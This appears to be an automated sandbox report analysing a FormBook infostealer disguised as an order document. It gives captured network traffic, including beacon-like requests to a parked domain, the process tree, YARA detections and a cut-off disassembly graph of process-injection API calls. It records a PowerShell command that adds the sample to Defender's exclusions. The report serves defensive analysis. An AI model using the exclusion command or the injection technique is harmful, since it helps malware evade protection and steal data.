6a 39 7a 35 32 59 2f 34 58 68 57 72 51 77 31 6e 6a 6d 4b 35 [TRUNCATED]
                                                    Data Ascii: 7Dihs8p=3W0pN7WNy+URj6BbV779OWUirUe+C6KO//PJ3d6QVK/UP80XE5CcuamxcbhxWC10KW1tvt0ZlN9cEaBEFDGJhhJFzbHWrikLpwbOwTLXQT6ZDTbMoZpMqQgSe8Gm7bx8q/IQBLnq41lrs20PwoUkgKfi3mthKsuHiIBG9YOFXy6JJCF815OsLpI3pUvW4X94GPKdeOx2d3bySu+zQMHCh6/PFFt1wBk0JdL1IHvhVpK4KBm1CeJrwbT4uWNbmGKBY5kYGmrV73pKZj6IDus3UvX98MFEQGANmewyh9Hp/DFOEX/JaTa+D3j9z52Y/4XhWrQw1njmK5X8gIaSI7FihWn4amRYyOeLQsLmCeeLgWj7GBuFgeAr4CQ+OE3BW4yO892REAalMg7An16aEFSkpbmxv7w3qntgYhoqR7oZihZqZYI2JX6FI7WptdOhZTP3ai065d7EVZprK6zlFhCVtwZf5XZ/N+z/poOH6ajeAFfo94NTWWtW5JgX4QdGoMBrJd/SFcOst3K1OvvzPBCVRCPtroSs99UevoHhOZa2A16wAH9UXJnTyWREmo4NCA5UcHnXuWEPVyV4h6AUFEmyIXJZ6SI16ddtuts4/6Q/SBBjoRFY0NVq1dleKfKTtM9TfYyUSMdahW9gDTNFL5+vH+6CJ/AEoa7Mk6UCME53uW31zsCbCrNjGN9NT5D7V+bs1vKei8jb5UyIcDidiravcmsULyVofpKrWLGuCEFyMwg9s7H9FK5Yz9zx4D+CEumFGaLhOY6jpHsWHwBjucinwGGDN1OS4KYKZcH0nu5zMaDzY2+nKiEFN+AxxHClLT3G7daXcdikp0RDpLRWmY24dJAup3RUcAfUyMcBUcGVjWtd5hYMET3wlvCAM/w4MSAwTdhDqDOO2RwjYtotH67QYO8w9LEFIFp61T0aioOw1eriOnAJGqTICnrTa84Ax4tUNZixZo2xeYfhXodQcZvefSEym0UBNawKRBzN9EmaYAkp [TRUNCATED]
                                                    Jul 3, 2024 17:54:11.343502998 CEST305INHTTP/1.1 405 Not Allowed
                                                    date: Wed, 03 Jul 2024 15:54:11 GMT
                                                    content-type: text/html
                                                    content-length: 154
                                                    server: Parking/1.0
                                                    connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    48192.168.2.64977964.190.62.2280
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:54:14.460971117 CEST351OUTGET /pv57/?7Dihs8p=6UcJOPuI3ds3m8dRFaGqe18kk0aRE6C9zfep+6iQQcPKXv8sEJKo1I2dFrwlAwFzKSJLgqMZnt8gW4RLGDqdj2op7I/d7Qwx4DLM/Sb7UzOzABLy3akf6gQBeurdxZRPhPoEffE=&Bp=2LpD8tLh HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.hondamechanic.today
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:54:15.122764111 CEST1236INHTTP/1.1 200 OK
                                                    date: Wed, 03 Jul 2024 15:54:15 GMT
                                                    content-type: text/html; charset=UTF-8
                                                    transfer-encoding: chunked
                                                    vary: Accept-Encoding
                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    pragma: no-cache
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_1X9tEZKJRzgehQdSsJ49RXYKM8b4TLpXhlnFJwOt87Fy/HNI0KLeWIMD1xr6flNJzJzV1X9WkaRc4cxp7p/ZwA==
                                                    last-modified: Wed, 03 Jul 2024 15:54:15 GMT
                                                    x-cache-miss-from: parking-64f5d45c5c-fphbs
                                                    server: Parking/1.0
                                                    connection: close
                                                    Data Raw: 32 45 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 31 58 39 74 45 5a 4b 4a 52 7a 67 65 68 51 64 53 73 4a 34 39 52 58 59 4b 4d 38 62 34 54 4c 70 58 68 6c 6e 46 4a 77 4f 74 38 37 46 79 2f 48 4e 49 30 4b 4c 65 57 49 4d 44 31 78 72 36 66 6c 4e 4a 7a 4a 7a 56 31 58 39 57 6b 61 52 63 34 63 78 70 37 70 2f 5a 77 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 68 6f 6e 64 61 6d 65 63 68 61 6e 69 63 2e 74 6f 64 61 79 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b [TRUNCATED]
                                                    Data Ascii: 2E2<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_1X9tEZKJRzgehQdSsJ49RXYKM8b4TLpXhlnFJwOt87Fy/HNI0KLeWIMD1xr6flNJzJzV1X9WkaRc4cxp7p/ZwA==><head><meta charset="utf-8"><title>hondamechanic.today&nbsp;-&nbsp;hondamechanic Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="hondamechanic.today is your first and best source for all of the
                                                    Jul 3, 2024 17:54:15.122782946 CEST1236INData Raw: 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65
                                                    Data Ascii: information youre looking for. From general topics to more of what you would expect to find here, hondamechanic.today has it all. We hope you find what 1062you are searching for!"><link rel="icon" type="image/png"
                                                    Jul 3, 2024 17:54:15.122796059 CEST1236INData Raw: 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74
                                                    Data Ascii: ck}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,sele
                                                    Jul 3, 2024 17:54:15.122864962 CEST1236INData Raw: 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f
                                                    Data Ascii: rit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#273948;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{col
                                                    Jul 3, 2024 17:54:15.122875929 CEST1236INData Raw: 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 20 61 7b 63 6f 6c 6f 72 3a 23 39 34 39 34
                                                    Data Ascii: ntainer-disclaimer__content-text{color:#949494}.container-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__content-link{font-s
                                                    Jul 3, 2024 17:54:15.122888088 CEST1236INData Raw: 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6c 61 72 67 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b
                                                    Data Ascii: argin-right:0px;margin-bottom:5px;margin-left:0px;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition:all .3s;-moz-
                                                    Jul 3, 2024 17:54:15.122899055 CEST1236INData Raw: 3a 23 32 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 2d 73 6d 3a 68 6f 76 65 72 7b
                                                    Data Ascii: :#218838;border-color:#218838;color:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:med
                                                    Jul 3, 2024 17:54:15.122910023 CEST1236INData Raw: 6c 61 74 65 58 28 32 36 70 78 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 7d 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 37 33 39 34 38 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41
                                                    Data Ascii: lateX(26px);transform:translateX(26px)}body{background-color:#273948;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:5%;padding-rig
                                                    Jul 3, 2024 17:54:15.123114109 CEST1236INData Raw: 77 3a 32 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29
                                                    Data Ascii: w:2;-moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1;top:-300px;right:-50px;height:1300px;position:inherit}.container-content--lp{min-height:920px}.container-content--rp{min-height:
                                                    Jul 3, 2024 17:54:15.123126030 CEST1236INData Raw: 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 39 66 64 38 30 31 7d 2e
                                                    Data Ascii: ds-list__list-element-link{font-size:1em;text-decoration:underline;color:#9fd801}.two-tier-ads-list__list-element-link:link,.two-tier-ads-list__list-element-link:visited{text-decoration:underline}.two-tier-ads-list__list-element-link:hover,.tw
                                                    Jul 3, 2024 17:54:15.128501892 CEST1236INData Raw: 61 72 6b 69 6e 67 2e 63 6f 6d 22 2c 22 61 64 62 6c 6f 63 6b 6b 65 79 22 3a 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77
                                                    Data Ascii: arking.com","adblockkey":" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_1X9tEZKJRzgehQdSsJ49RXYKM8b4TLpXhlnFJwOt87Fy/HNI0KLeWIMD1xr6flNJzJzV1X9


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:11:50:06
                                                    Start date:03/07/2024
                                                    Path:C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"
                                                    Imagebase:0x470000
                                                    File size:995'840 bytes
                                                    MD5 hash:F07575DCCCAA8B88972464B50B63B017
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:11:50:08
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"
                                                    Imagebase:0x7d0000
                                                    File size:433'152 bytes
                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:4
                                                    Start time:11:50:08
                                                    Start date:03/07/2024
                                                    Path:C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"
                                                    Imagebase:0x1f0000
                                                    File size:995'840 bytes
                                                    MD5 hash:F07575DCCCAA8B88972464B50B63B017
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:5
                                                    Start time:11:50:08
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:6
                                                    Start time:11:50:08
                                                    Start date:03/07/2024
                                                    Path:C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"
                                                    Imagebase:0xc20000
                                                    File size:995'840 bytes
                                                    MD5 hash:F07575DCCCAA8B88972464B50B63B017
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2526010135.0000000001700000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2526010135.0000000001700000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2527736172.00000000038C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2527736172.00000000038C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:10
                                                    Start time:11:50:41
                                                    Start date:03/07/2024
                                                    Path:C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe"
                                                    Imagebase:0xae0000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4561941727.0000000004890000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.4561941727.0000000004890000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:12
                                                    Start time:11:50:43
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\SysWOW64\compact.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\compact.exe"
                                                    Imagebase:0x50000
                                                    File size:41'472 bytes
                                                    MD5 hash:5CB107F69062D6D387F4F7A14737220E
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4562052256.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4562052256.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4561997871.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4561997871.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:moderate
                                                    Has exited:false

                                                    General

                                                    Target ID:14
                                                    Start time:11:50:56
                                                    Start date:03/07/2024
                                                    Path:C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe"
                                                    Imagebase:0xae0000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4564754025.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.4564754025.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:15
                                                    Start time:11:51:08
                                                    Start date:03/07/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff728280000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:11.4%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:263
                                                      Total number of Limit Nodes:12
                                                      execution_graph 28974 4884c88 28975 4884e13 28974->28975 28977 4884cae 28974->28977 28977->28975 28978 48847e0 28977->28978 28979 4884f08 PostMessageW 28978->28979 28980 4884f74 28979->28980 28980->28977 28981 b9d438 28982 b9d47e 28981->28982 28986 b9d618 28982->28986 28989 b9d608 28982->28989 28983 b9d56b 28992 b9b790 28986->28992 28990 b9d646 28989->28990 28991 b9b790 DuplicateHandle 28989->28991 28990->28983 28991->28990 28993 b9d680 DuplicateHandle 28992->28993 28994 b9d646 28993->28994 28994->28983 29027 b94668 29028 b9467a 29027->29028 29029 b94686 29028->29029 29031 b94779 29028->29031 29032 b9479d 29031->29032 29036 b94888 29032->29036 29040 b94878 29032->29040 29037 b948af 29036->29037 29038 b9498c 29037->29038 29044 b944e0 29037->29044 29042 b94882 29040->29042 29041 b9498c 29041->29041 29042->29041 29043 b944e0 CreateActCtxA 29042->29043 29043->29041 29045 b95918 CreateActCtxA 29044->29045 29047 b959db 29045->29047 29047->29047 29048 4882669 29049 48825fc 29048->29049 29051 48825d4 29048->29051 29050 48825e3 29051->29050 29055 48835e8 29051->29055 29073 488365e 29051->29073 29092 48835f8 29051->29092 29056 4883612 29055->29056 29065 488361a 29056->29065 29110 4883c0d 29056->29110 29116 4883c96 29056->29116 29122 4883c36 29056->29122 29128 4883af3 29056->29128 29138 4883e53 29056->29138 29154 4883ef2 29056->29154 29160 4883a92 29056->29160 29172 4883b51 29056->29172 29182 4884330 29056->29182 29188 48841be 29056->29188 29193 4883e39 29056->29193 29203 4883e58 29056->29203 29209 4883de7 29056->29209 29215 4883b67 29056->29215 29221 4883ba2 29056->29221 29065->29050 29074 48835ec 29073->29074 29075 4883661 29073->29075 29076 4883c0d 4 API calls 29074->29076 29077 4883ba2 6 API calls 29074->29077 29078 488361a 29074->29078 29079 4883b67 4 API calls 29074->29079 29080 4883de7 4 API calls 29074->29080 29081 4883e58 4 API calls 29074->29081 29082 4883e39 6 API calls 29074->29082 29083 48841be 4 API calls 29074->29083 29084 4884330 4 API calls 29074->29084 29085 4883b51 5 API calls 29074->29085 29086 4883a92 8 API calls 29074->29086 29087 4883ef2 4 API calls 29074->29087 29088 4883e53 8 API calls 29074->29088 29089 4883af3 6 API calls 29074->29089 29090 4883c36 4 API calls 29074->29090 29091 4883c96 4 API calls 29074->29091 29075->29050 29076->29078 29077->29078 29078->29050 29079->29078 29080->29078 29081->29078 29082->29078 29083->29078 29084->29078 29085->29078 29086->29078 29087->29078 29088->29078 29089->29078 29090->29078 29091->29078 29093 4883612 29092->29093 29094 4883c0d 4 API calls 29093->29094 29095 4883ba2 6 API calls 29093->29095 29096 4883b67 4 API calls 29093->29096 29097 4883de7 4 API calls 29093->29097 29098 4883e58 4 API calls 29093->29098 29099 4883e39 6 API calls 29093->29099 29100 48841be 4 API calls 29093->29100 29101 4884330 4 API calls 29093->29101 29102 488361a 29093->29102 29103 4883b51 5 API calls 29093->29103 29104 4883a92 8 API calls 29093->29104 29105 4883ef2 4 API calls 29093->29105 29106 4883e53 8 API calls 29093->29106 29107 4883af3 6 API calls 29093->29107 29108 4883c36 4 API calls 29093->29108 29109 4883c96 4 API calls 29093->29109 29094->29102 29095->29102 29096->29102 29097->29102 29098->29102 29099->29102 29100->29102 29101->29102 29102->29050 29103->29102 29104->29102 29105->29102 29106->29102 29107->29102 29108->29102 29109->29102 29111 4883c30 29110->29111 29112 48841f1 29111->29112 29231 4882018 29111->29231 29237 4881f30 29111->29237 29241 4881f2c 29111->29241 29117 4883c9c 29116->29117 29245 4881470 29117->29245 29250 4881478 29117->29250 29254 4881521 29117->29254 29118 4883e1a 29118->29065 29123 4884337 29122->29123 29124 4884359 29123->29124 29125 4882018 2 API calls 29123->29125 29261 4882020 29123->29261 29265 48820f9 29123->29265 29125->29124 29129 4883aff 29128->29129 29130 4883b11 29129->29130 29131 488409c 29129->29131 29270 4881a38 29129->29270 29274 4881a30 29129->29274 29132 48840c0 29130->29132 29135 4882018 2 API calls 29130->29135 29136 4881f2c WriteProcessMemory 29130->29136 29137 4881f30 WriteProcessMemory 29130->29137 29132->29065 29135->29132 29136->29132 29137->29132 29139 4883e81 29138->29139 29140 4883e0e 29139->29140 29141 4883e86 29139->29141 29142 4883e1a 29140->29142 29151 4881478 ResumeThread 29140->29151 29152 4881470 ResumeThread 29140->29152 29153 4881521 2 API calls 29140->29153 29144 4883e83 29141->29144 29148 4882018 2 API calls 29141->29148 29149 4881f2c WriteProcessMemory 29141->29149 29150 4881f30 WriteProcessMemory 29141->29150 29142->29065 29143 4884319 29143->29065 29144->29143 29145 4882018 2 API calls 29144->29145 29146 4881f2c WriteProcessMemory 29144->29146 29147 4881f30 WriteProcessMemory 29144->29147 29145->29144 29146->29144 29147->29144 29148->29144 29149->29144 29150->29144 29151->29142 29152->29142 29153->29142 29155 4883ef8 29154->29155 29156 48840c0 29155->29156 29157 4882018 2 API calls 29155->29157 29158 4881f2c WriteProcessMemory 29155->29158 29159 4881f30 WriteProcessMemory 29155->29159 29156->29065 29157->29156 29158->29156 29159->29156 29279 48821b8 29160->29279 29283 48821ac 29160->29283 29161 4883b11 29164 48840c0 29161->29164 29165 4882018 2 API calls 29161->29165 29166 4881f2c WriteProcessMemory 29161->29166 29167 4881f30 WriteProcessMemory 29161->29167 29162 4883ad4 29162->29161 29163 488409c 29162->29163 29168 4881a38 VirtualAllocEx 29162->29168 29169 4881a30 VirtualAllocEx 29162->29169 29164->29065 29165->29164 29166->29164 29167->29164 29168->29162 29169->29162 29173 4883cc3 29172->29173 29174 4883b5e 29172->29174 29178 4881521 2 API calls 29173->29178 29288 4881528 29173->29288 29179 4881478 ResumeThread 29174->29179 29180 4881470 ResumeThread 29174->29180 29181 4881521 2 API calls 29174->29181 29175 4883cde 29175->29065 29176 4883e1a 29176->29065 29178->29175 29179->29176 29180->29176 29181->29176 29183 4884336 29182->29183 29185 4882018 2 API calls 29183->29185 29186 48820f9 ReadProcessMemory 29183->29186 29187 4882020 ReadProcessMemory 29183->29187 29184 4884359 29185->29184 29186->29184 29187->29184 29190 4882018 2 API calls 29188->29190 29191 4881f2c WriteProcessMemory 29188->29191 29192 4881f30 WriteProcessMemory 29188->29192 29189 48841f1 29190->29189 29191->29189 29192->29189 29194 4883aff 29193->29194 29194->29193 29195 488409c 29194->29195 29196 4883b11 29194->29196 29201 4881a38 VirtualAllocEx 29194->29201 29202 4881a30 VirtualAllocEx 29194->29202 29197 